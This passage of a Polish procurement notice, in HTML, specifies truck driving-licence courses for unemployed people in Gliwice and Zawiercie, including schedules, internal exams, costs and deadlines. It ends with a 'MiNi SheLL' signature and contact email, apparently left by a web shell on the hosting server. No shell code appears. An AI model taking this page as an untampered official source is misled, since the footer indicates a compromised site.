Uczestnicy kursu będą posiadać ważne badania lekarskie umożliwiające uczestnictwo w kursie. Szkolenie z obsługi wózków jezdniowych musi być prowadzone w 6 grupach po 10 osób w każdej z grup. Zamawiający przedstawi pisemnie listę uczestników kursu.
Wartość niniejszego zamówienia nie przekracza 14.000 Euro..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Kurs na prawo jazdy kategorii C (Gliwice).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeszkolenie 20 osób bezrobotnych w ramach:
Kursu na prawo jazdy kategorii C.
Celem kursu jest przygotowanie osoby starającej się o prawo jazdy kategorii C do kierowania pojazdami powyżej 3,5 tony w sposób nie zagrażający bezpieczeństwu i porządkowi ruchu.
Uczestnicy kursu będą posiadać ważne badania lekarskie umożliwiające uczestnictwo w kursie. Zamawiający przedstawi pisemnie listę uczestników kursu.
Maksymalny okres trwania kursu dla jednej grupy powinien wynosić 8 tygodni od momentu rozpoczęcia kursu. Szkolenie składa się z części teoretycznej (min. 20 godz.) oraz praktycznej (min. 30 godz. dla każdego uczestnika szkolenia). Zajęcia powinny odbywać się od poniedziałku do piątku, a dopuszczalna godzina zakończenia zajęć nie późniejsza niż 21:00. Zajęcia teoretyczne powinny się odbywać na terenie Gliwic. Na zajęcia praktyczne instruktor będzie indywidualnie się umawiał z uczestnikiem kursu. Jeżeli zajęcia teoretyczne będą odbywać się poza miastem Gliwice, Wykonawca zobowiązuje się zorganizować na swój koszt transport wszystkich uczestników kursu do miejsca w którym będą się odbywać zajęcia teoretyczne oraz ich powrót do Gliwic. Szkolenie prowadzone będzie w 2 grupach po 10 osób w każdej z grup. 
1 godzina zajęć teoretycznych i praktycznych = 60 minut
Ustalone jazdy z uczestnikiem zostają zapisane w grafiku, który stanowi podstawę do ewentualnych zmian. Ustalone godziny jazd można przełożyć bez żadnych konsekwencji dwa pełne dni robocze przed wyznaczonym terminem. Instruktor prowadzący przeprowadza egzamin wewnętrzny oraz ponosi całkowitą odpowiedzialność za praktyczne przygotowanie osoby szkolonej do egzaminu państwowego.
W trakcie szkolenia istnieje możliwość zmiany instruktora prowadzącego, zgłaszając kierownikowi ośrodka na piśmie uzasadnienie swojej decyzji.
Po ukończeniu każdej jazdy instruktor wypisuje kartę przeprowadzonych zajęć i szczegółowo wyjaśnia spostrzeżenia i błędy z niej wynikające.
Wykonawca udostępnia uczestnikowi kursu stanowiska wyposażone w sprzęt komputerowy wykorzystujący oryginalne licencjonowane oprogramowanie z ITS (program egzaminacyjny TEST) zgodny z programem i sprzętem (specjalna klawiatura) wykorzystywanym w WORD-ach na terenie całego kraju, z których można korzystać codziennie w godzinach otwarcia ośrodka szkoleniowego.
Wykładowca prowadzący zajęcia teoretyczne z określoną grupą nie może w tym czasie prowadzić zajęć z inną grupą.
Na ostatniej jeździe kursowej zostaje przeprowadzany przez instruktora prowadzącego, egzamin wewnętrzny z praktyki na zasadach egzaminu państwowego. Po przeprowadzonym egzaminie instruktor prowadzący wypełnia kartę przeprowadzenia egzaminu wewnętrznego i wystawia opinię osobie egzaminowanej, określając jej przygotowanie praktyczne.
Jeżeli instruktor uzna, iż osoba nie jest przygotowana do zdawania egzaminu państwowego (tj. nie uzyskała pozytywnej oceny z egzaminu wew.), zaświadczenie o ukończeniu kursu nie zostaje jej wydane, a Wykonawca zobowiązany jest do wyznaczenia tej osobie następnego terminu. Wszelkie koszty wynikające z powtórkowych egzaminów wewnętrznych ponosi Wykonawca. 
Po zakończeniu kursu i zdaniu wewnętrznego egzaminu, kursant otrzymuje Zaświadczenie o ukończeniu kursu, które jest jednym z dokumentów wymaganych przy ubieganiu się o prawo jazdy w Wojewódzkim Ośrodku Ruchu Drogowego. Wszelkie koszty związane z państwowym egzaminem na prawo jazdy kategorii C ponosi Wykonawca i mają być wliczone w cenie kursu. W sytuacji w której uczestnik kursu nie zda egzaminu państwowego, koszty związane z kolejnym egzaminem pokrywa sam uczestnik kursu.
Wartość niniejszego zamówienia nie przekracza 14.000 Euro..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Kurs na prawo jazdy kategorii C (Zawiercie).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeszkolenie 30 osób bezrobotnych w ramach:
Kursu na prawo jazdy kategorii C.
Celem kursu jest przygotowanie osoby starającej się o prawo jazdy kategorii C do kierowania pojazdami powyżej 3,5 tony w sposób nie zagrażający bezpieczeństwu i porządkowi ruchu.
Uczestnicy kursu będą posiadać ważne badania lekarskie umożliwiające uczestnictwo w kursie. Zamawiający przedstawi pisemnie listę uczestników kursu.
Maksymalny okres trwania kursu dla jednej grupy powinien wynosić 8 tygodni od momentu rozpoczęcia kursu. Szkolenie składa się z części teoretycznej (min. 20 godz.) oraz praktycznej (min. 30 godz. dla każdego uczestnika szkolenia). Zajęcia powinny odbywać się od poniedziałku do piątku, a dopuszczalna godzina zakończenia zajęć nie późniejsza niż 21:00. Zajęcia teoretyczne powinny się odbywać na terenie Zawiercia. Na zajęcia praktyczne instruktor będzie indywidualnie się umawiał z uczestnikiem kursu. Jeżeli zajęcia teoretyczne będą odbywać się poza miastem Zawiercie, Wykonawca zobowiązuje się zorganizować na swój koszt transport wszystkich uczestników kursu do miejsca w którym będą się odbywać zajęcia teoretyczne oraz ich powrót do Zawiercia. Szkolenie prowadzone będzie w 3 grupach po 10 osób w każdej z grup. 
1 godzina zajęć teoretycznych i praktycznych = 60 minut
Ustalone jazdy z uczestnikiem zostają zapisane w grafiku, który stanowi podstawę do ewentualnych zmian. Ustalone godziny jazd można przełożyć bez żadnych konsekwencji dwa pełne dni robocze przed wyznaczonym terminem. Instruktor prowadzący przeprowadza egzamin wewnętrzny oraz ponosi całkowitą odpowiedzialność za praktyczne przygotowanie osoby szkolonej do egzaminu państwowego.
W trakcie szkolenia istnieje możliwość zmiany instruktora prowadzącego, zgłaszając kierownikowi ośrodka na piśmie uzasadnienie swojej decyzji.
Po ukończeniu każdej jazdy instruktor wypisuje kartę przeprowadzonych zajęć i szczegółowo wyjaśnia spostrzeżenia i błędy z niej wynikające.
Wykonawca udostępnia uczestnikowi kursu stanowiska wyposażone w sprzęt komputerowy wykorzystujący oryginalne licencjonowane oprogramowanie z ITS (program egzaminacyjny TEST) zgodny z programem i sprzętem (specjalna klawiatura) wykorzystywanym w WORD-ach na terenie całego kraju, z których można korzystać codziennie w godzinach otwarcia ośrodka szkoleniowego.
Wykładowca prowadzący zajęcia teoretyczne z określoną grupą nie może w tym czasie prowadzić zajęć z inną grupą.
Na ostatniej jeździe kursowej zostaje przeprowadzany przez instruktora prowadzącego, egzamin wewnętrzny z praktyki na zasadach egzaminu państwowego. Po przeprowadzonym egzaminie instruktor prowadzący wypełnia kartę przeprowadzenia egzaminu wewnętrznego i wystawia opinię osobie egzaminowanej, określając jej przygotowanie praktyczne.
Jeżeli instruktor uzna, iż osoba nie jest przygotowana do zdawania egzaminu państwowego (tj. nie uzyskała pozytywnej oceny z egzaminu wew.), zaświadczenie o ukończeniu kursu nie zostaje jej wydane, a Wykonawca zobowiązany jest do wyznaczenia tej osobie następnego terminu. Wszelkie koszty wynikające z powtórkowych egzaminów wewnętrznych ponosi Wykonawca. 
Po zakończeniu kursu i zdaniu wewnętrznego egzaminu, kursant otrzymuje Zaświadczenie o ukończeniu kursu, które jest jednym z dokumentów wymaganych przy ubieganiu się o prawo jazdy w Wojewódzkim Ośrodku Ruchu Drogowego. Wszelkie koszty związane z państwowym egzaminem na prawo jazdy kategorii C ponosi Wykonawca i mają być wliczone w cenie kursu. W sytuacji w której uczestnik kursu nie zda egzaminu państwowego, koszty związane z kolejnym egzaminem pokrywa sam uczestnik kursu.
Wartość niniejszego zamówienia przekracza 14.000 Euro..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com